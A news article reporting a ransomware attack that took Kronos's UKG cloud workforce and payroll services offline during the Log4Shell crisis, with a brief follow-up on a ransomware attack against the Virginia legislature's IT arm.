As Log4Shell wreaks havoc, payroll service reports ransomware attack

As Log4Shell wreaks havoc, payroll service reports ransomware attack

Getty Images

reader comments

129 with 89 posters participating

As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.

The company said on Sunday that services using the Kronos Private Cloud had been unavailable for the past day, with the attack taking down Kronos’ UKG Workforce Central, UKG TeleStaff, and Banking Scheduling Solutions services.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” Kronos representative Leo Daley wrote. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules, and to manage other related operations important to their organization.”

Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”

“We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”

rely heavily on Java, the software framework that Log4J is based on. The Log4Shell vulnerability, which gives hackers the ability to execute malicious code with elevated system privileges, is trivial to exploit. Often, attacks can come from users visiting a page with a browser that includes plaintext commands in the user agent.

Kronos said it had retained cybersecurity experts and has notified authorities. It said customers’ on-premises services aren’t affected.

Separately, the IT arm of the Virginia state legislature reported suffering a ransomware attack that occurred on late Friday, the Associated press reported. The Legislative Automated Systems in 2019 purchased Java licenses, an indication that the IT group uses the software framework. While it’s unknown what the vector was for the breach, both its timing and the use of Java are consistent with the possibility Log4Shell played a key role.

This post will be updated with any new information that comes to light.

Post updated to add detail about Virginia legislature ransomware attack.

Article Tags:
Article Categories: